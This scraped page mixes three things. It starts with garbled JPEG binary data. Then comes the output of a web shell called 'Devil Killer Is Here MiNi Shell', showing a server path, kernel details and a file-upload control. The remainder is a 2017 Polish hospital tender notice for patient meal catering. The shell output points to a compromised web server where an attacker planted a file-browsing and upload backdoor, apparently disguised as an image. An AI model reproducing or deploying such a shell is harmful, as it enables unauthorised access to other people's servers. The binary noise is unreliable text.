JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170328/53256-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zozsiemianowice.pl' target='_blank'>http://www.zozsiemianowice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 53256 - 2017
              z dnia 2017-03-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Siemianowice Śląskie: Przedmiotem zamówienia jest wykonywanie przez okres 12 miesięcy dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. usług przygotowywania i dostarczania posiłków dla pacjentów.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Szpital Miejski w Siemianowicach Śląskich Spółka z o.o., krajowy numer identyfikacyjny
              30827000000, ul.
              ul. 1-go Maja 
              9,
              41-100  
              Siemianowice Śląskie, woj.
              śląskie, państwo
              Polska, tel.
              322 281 930, e-mail
              spzzoz@zozsiemianowice.pl, faks
              322 281 498.
              <br />
              Adres strony internetowej (URL): www.zozsiemianowice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zozsiemianowice.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zozsiemianowice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemne złożenie ofert w zamkniętych i zabezpieczonych kopertach. Dostarczenie samodzielnie lub przez operatora pocztowego<br />
                Adres:
                <br />Szpital Miejski w Siemianowicach Śląskich Sp. z o.o., ul. 1-go Maja 9, 41  100 Siemianowice Śląskie - sekretariat Pokój A002</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia jest wykonywanie przez okres 12 miesięcy dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. usług przygotowywania i dostarczania posiłków dla pacjentów.<br /><b>Numer referencyjny: </b>SZM/DN/DZ/341/09/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest świadczenie przez okres 12 miesięcy dla pacjentów Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. usługi polegającą na kompleksowym przygotowywaniu posiłków śniadanie, obiad (zupa + drugie danie) kolacja, posiłków miksowanych wysokobiałkowych, zup płynnych dietetycznych oraz dostarczaniu ich do siedziby Zamawiającego do miejsc określonych w pkt.3.
2.	Wszystkie posiłki powinny być przygotowywane zgodnie z obowiązującymi normami żywieniowymi wg Instytutu Żywienia i Żywności, jak również przepisami prawa w zakresie higieny żywienia, a w szczególności:
	Rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny produktów żywnościowych,
	Codex Alimentarius (Kodeks Żywnościowy) CAC/RCP 39  1993,
	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie zdrowotnym żywności i żywienia (Dz. U. Nr 171 poz. 1225 wraz z późniejsza nowelizacją Dz. U. 2010 r. nr 21 poz. 105)
	norm HACCP 
	oraz wewnętrznymi przepisami Zamawiającego.
3.	Wykonawca będzie miał obowiązek dostarczania posiłków własnym transportem i we własnych naczyniach do kuchenek oddziałowych Szpitala Miejskiego w Siemianowicach Śląskich Sp.  z o.o., ul. 1  go Maja 9:
	Oddział Rehabilitacji Narządu Ruchu
	Oddział Chirurgii Urazowo-Ortopedycznej 
	Oddział Chirurgii Ogólnej 
	Oddział Anestezjologii i Intensywnej Terapii 
	Oddział Wewnętrzny I
	Oddział Wewnętrzny II
	Oddział Ginekologiczny
	Oddział Położniczy
<br /><br /><b>II.5) Główny kod CPV: </b>55321000-6<br /><b> Dodatkowe kody CPV:</b>55520000-1,
                55322000-3,
                55521200-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b>4.	Wykonawca będzie zobowiązany w sporadycznych jednostkowych przypadkach chorobowych do dostarczenia posiłku diety specjalistycznej skalkulowanego jednorazowo wg. zamówienia.
5.	Wykonawca będzie zobowiązany do informowania o składnikach oraz składnikach lub substancjach pomocniczych powodujących alergie lub reakcje nietolerancji w dietach przy przekazaniu jadłospisu na dany okres. Jednocześnie Wykonawca będzie zobowiązany do podania nr telefonu pod którym każdy pacjent lub pracownik Zamawiającego otrzyma ww. informację.  
6.	Wykonawca będzie zobowiązany do sporządzenia jadłospisu dekadowego (10 - dniowego). Jadłospis ten winien być przedstawiony Zamawiającemu z co najmniej 3 dniowym wyprzedzeniem (przed terminem obowiązywania dekadówki). Posiłki nie mogą się powtarzać przez okres 10 dni a jadłospis musi posiadać wyszczególnioną gramaturę poszczególnych potraw i produktów, oraz obliczoną wartość kaloryczną i odżywczą odpowiadającą wymogom SIWZ.
7.	Wykonawca ma obowiązek powierzenia swojemu dietetykowi przygotowywania jadłospisu w poszczególnych dietach. 
8.	Zakres usługi obejmuje dostarczanie posiłków z zachowaniem zasad:
a)	Wykonawca ma obowiązek zapewnić dostarczanie posiłków dla pacjentów we wszystkie dni tygodnia 3 razy dziennie zgodnie z poniższymi zasadami:
	śniadanie 730  800
	obiad 1230  1300 
	kolacja 1700  1730
	dodatkowe posiłki dotyczące diety cukrzycowej, diety wysokobiałkowej będą dostarczane w uzgodnieniu z wykonawcą np. drugie śniadanie razem z pierwszym śniadaniem 
b)	zgodność wykonywanych czynności z obowiązującymi normami zaleconymi przez Państwowego Inspektora Sanitarnego,
c)	planowanie i sporządzanie posiłków wg. najnowszych zasad dietetyki, 
d)	planowanie i sporządzanie posiłków o właściwej temperaturze,
e)	zachowanie zasad higieny i obowiązujących przepisów sanitarnych przy przygotowywaniu i transporcie posiłków,
f)	zapewnienie ciągłości dostaw posiłków bez względu na ewentualne awarie i wstrzymanie produkcji,
g)	przygotowanie posiłków z produktów świeżych z ważnym terminem przydatności do spożycia w warunkach zgodnych z wymogami sanitarno  epidemiologicznymi,
h)	stosowanie się przy wykonywaniu czynności związanych z realizacja zamówienia do zasad systemu HACCP,
i)	odbieranie każdorazowo pozostałości pokonsumpcyjnych,
9.	Podstawowe zasady sporządzania posiłków dla pacjentów Zamawiającego:
a)	Normy dziennych racji pokarmowych, ich wartość kaloryczna i zawartość składników odżywczych są zgodne z  zalecanymi przez Instytut Żywności i Żywienia Podstawy naukowe Żywienia w szpitalach, rok 2001, pod kierownictwem prof. J. Dzienisiewicza.
b)	Wykaz diet stosowanych przez Zamawiającego:
1.	Dieta podstawowa, tzw. Normalna
1a. Dieta bogatoresztkowa
2.	Dieta łatwo strawna 
3.	Dieta łatwo strawna o zmienionej konsystencji - papkowata
3a. Dieta łatwo strawna płynna
3b. Dieta łatwo strawna płynna wzmocniona
3c. Dieta do żywienia przez zgłębnik lub sondę
5.	Dieta łatwo strawna o kontrolowanej zawartości kwasów tłuszczowych
6.	Dieta bogato białkowa
7.	Dieta z ograniczeniem łatwo przyswajalnych węglowodanów
8.	Dieta niskobiałkowa
10.	Planowana ilość posiłków:
1.	zupy -  około 43 000 rocznie
2.	drugie dania  - około 43 000 rocznie
3.	dieta miksowana  około 300 rocznie
4.	zupa płynna dietetyczna  około 1 200 rocznie
11.	Temperatura posiłków w chwili pomiaru u Zamawiającego musi mieć co najmniej:
a)	zupa  75 C
b)	II danie (mięso, sos, ziemniaki)  65 C
c)	sałatki i surówki  4 C
12.	Minimalna wymagana gramatura potraw podawanych pacjentom w jednym posiłku nie może być mniejsza niż:
a)	Potrawy gotowane:
	zupy 350 ml
	ryż, kasze, makarony 200g (do II dania)
	ziemniaki 250 g
b)	Surowiec:
	drób, mięsa b/kości minimum 80g -100g, I gatunek
	drób z kością minimum po 250g (udka, kurczaki)
	ryby 100-120g
c)	Inne produkty:
	wędliny 40g
	pasty 60g
	jajko 1 szt (min. 50g)
	parówka drobiowa 50g
	ser biały 70g  80g
	ser żółty 40g
	pieczywo pszenne, żytnie i bezglutenowe 200g
	masło 10g - 15g
	surówki, sałatki do - II dania od 100g do 130g
	dodatek warzywny lub owocowy
	jabłko 100g
	pomidor 100g
13.	Dzienna racja pokarmowa składa się w zależności od stosowanej diety z trzech lub czterech posiłków: 
	śniadanie składające się z pieczywa, masła, dodatku do pieczywa, kawy zbożowej lub herbaty
	śniadanie II dla diet wysokobiałkowych, cukrzycowych oraz pacjentek oddziału położnictwa i ginekologii w postaci jogurtu, jajka, budyniu, sera białego lub pasty
	obiadu: zupy, drugiego dania, herbata lub kompot
	kolacja składająca się z pieczywa, masła, dodatku do pieczywa lub ciepłego posiłku i herbaty
14.	Procentowe zapotrzebowanie na energię dziennej racji pokarmowej składającej się z 3 posiłków powinno wynosić:
	śniadanie 30-35%
	obiad 40-45%
	kolacja 20-25 %
15.	Wymagane normy kalorii i składników pokarmowych obliczone na osobodzień:

Nazwa składnika 	Zalecane ilości
Kalorie 	ok. 2200  2400 kcal
Węglowodany 	ok. 300 - 400 g
Białko 	ok. 70 - 80 g 
W tym białko zwierzęce	ok. 25 - 40 g
Tłuszcz 
w tym NNKT	ok. 65 - 75 g
ok. 4  7 g 
Białko powinno pokrywać minimum 13-16% całodobowego zapotrzebowania kalorycznego, tłuszcze nie więcej niż 30% całodobowego zapotrzebowania kalorycznego natomiast reszta kalorii powinna zostać pokryta przez węglowodany.
16.	Ustala się wykaz produktów dostarczonych jako depozyty, które będą uzupełniane 1 raz w tygodniu
L.p. 	Nazwa produktu 	j.m 	Ilość 1 miesiąc
1	Cukier biały kryształ	kg 	10
2	Herbata 	Szt.	1000
3	Dżem owocowy 	Szt.	50
4	Suchary 	kg 	0,90
5	kleik ryżowy błyskawiczny	szt	10
6	kaszka mleczno ryżowa	szt	10
7	Kawa zbożowa	szt	20

17.	Pomiar temperatury, wagi oraz jakości dostarczonych posiłków odbywać się będzie przez osobę upoważnioną przez Zamawiającego 
w kuchenkach oddziałowych Zamawiającego w wybranych losowo terminach.
18.	Zamawiający oświadcza, iż dysponuje niezbędnym, certyfikowanym urządzeniem do pomiaru temperatury dostarczanych posiłków.
19.	Posiłki powinny być urozmaicone, muszą charakteryzować się wysoką jakością, posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę przy równoczesnym zapewnieniu sezonowości oraz potraw świątecznych.
20.	Zamawiający nie dopuszcza stosowania zup, sosów, ziemniaków itp. z komponentów proszkowych (torebek),
21.	Wykonawca będzie dostarczał posiłki codziennie, własnym transportem, na swój koszt, samochodem przystosowanym do przewozu żywności posiadającym pozytywną opinię Stacji Sanitarno-Epidemiologicznej. 
22.	Posiłki mają być dostarczane w odpowiednich termosach transportowych przystosowanych do transportu żywności, spełniających wymogi sanitarno-epidemiologiczne. 
23.	Wykonawca zobowiązany jest do udostępnienia upoważnionemu przedstawicielowi Zamawiającego 1 porcji każdego posiłku do degustacji w zakresie diety podstawowej i lekkostrawnej w celu dokonania kontroli jakości, wagi oraz estetyki zestawionego posiłki.
24.	Wykonawca zapewni odbiór, mycie, dezynfekcję termosów transportowych wraz z pozostałymi w nich niepokonsumpcyjnymi resztkami.
25.	Wykonawca zobowiązany jest do pobierania i przechowywania wszystkich potraw wchodzących w skład posiłku do celów sanitarno-epidemiologicznych zgodnie z obowiązującymi przepisami. Pobór próbek i ich przechowywanie następuje zgodnie z wymogami Rozporządzenia Ministra Zdrowia z dnia 17 kwietnia 2007r. w sprawie pobierania i przechowywania próbek żywności przez Zakłady Żywienia Zbiorowego typu zamkniętego  DZ.U. Z dnia 9.05.2007r nr 80 poz. 545).
26.	W przypadku zatrucia pokarmowego na skutek spożycia dostarczanych posiłków Wykonawca ponosi wszelką odpowiedzialność, w tym  koszty związane z usunięciem skutków zatrucia zarówno wobec Zamawiającego jak i osób trzecich.
27.	Wykonawca zapewni usuwanie wszystkich odpadów pokonsumpcyjnych zgodnie z obowiązującymi przepisami oraz wymogami sanitarno-epidemiologicznymi.
28.	Wykonawca zapewni odpowiedni pojemnik szczelnie zamykany na pozostałości pokonsumpcyjne pacjentów.
29.	Wszyscy pracownicy Wykonawcy realizujący zamówienie powinni być zaopatrzeni: 
a)	w jednolity strój i inne środki ochrony osobistej przystosowane do miejsca i charakteru pracy, 
b)	posiadać aktualną książeczkę zdrowia. 
30.	Za wszelkie uchybienia ujawnione w trakcie przeprowadzanych kontroli, wynikające ze świadczonej usługi odpowiada Wykonawca. 
 

</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek dotyczący sytuacji ekonomicznej lub finansowej jeżeli wykaże, że:
a)	posiada środki finansowe lub zdolność kredytową w wysokości, co najmniej 200.000,00 PLN brutto; 
b)	posiada opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż netto 400 000,00 zł (słownie: czterysta tysięcy złotych 00/100)  z klauzulą ubezpieczenia od przenoszenia chorób zakaźnych;
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej jeżeli wykaże, że:
a)	w okresie ostatnich 3 lat  zrealizował co najmniej trzy usługi przygotowania i dostarczania posiłków w systemie cateringowym w ramach żywienia zbiorowego o wartości minimum 300 000 PLN każda, których przedmiotem były usługi przygotowywania i dostarczania posiłków dla pacjentów w podmiotach leczniczych udzielającego świadczeń zdrowotnych w zakresie lecznictwa stacjonarnego. Na potwierdzenie spełnienia warunku Wykonawca dołączy wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich wartości, których przedmiotem były usługi przygotowywania i dostarczania posiłków  w podmiotach leczniczych udzielającego świadczeń zdrowotnych w zakresie lecznictwa stacjonarnego, dat wykonania i usługobiorców, oraz załączeniem poświadczenia, że te usługi zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 6 do SIWZ. Jeżeli   z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa, składa stosowne oświadczenie. W przypadku usług będących w trakcie realizacji zrealizowana część zamówienia musi mieć wartość minimalną wskazaną powyżej.
b)	dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  Wykonawca spełni warunek, jeżeli:
	przedstawi dokument potwierdzający wdrożenie systemu HACCP, 
	posiada min 2 środki transportu dopuszczone do przewozu żywności zgodnie z obowiązującymi przepisami, dopuszczone przez SANEPID,
	dysponuje kuchnią posiadającą dopuszczenia właściwych instytucji, w tym decyzje sanepidu dopuszczającą pomieszczenia do przygotowania posiłków dla żywienia zbiorowego, w tym cateringu w której będą przygotowywane posiłki dla pacjentów, zlokalizowaną nie dalej niż 40 km od siedziby Zamawiającego.
	dysponuje co najmniej 2 osobami posiadającymi kwalifikacje dietetyka, lub  jednego dietetyka klinicznego, które będą nadzorowały proces ustalania jadłospisów, przygotowania posiłków.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp stanowi Załącznik nr 7 do SIWZ</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
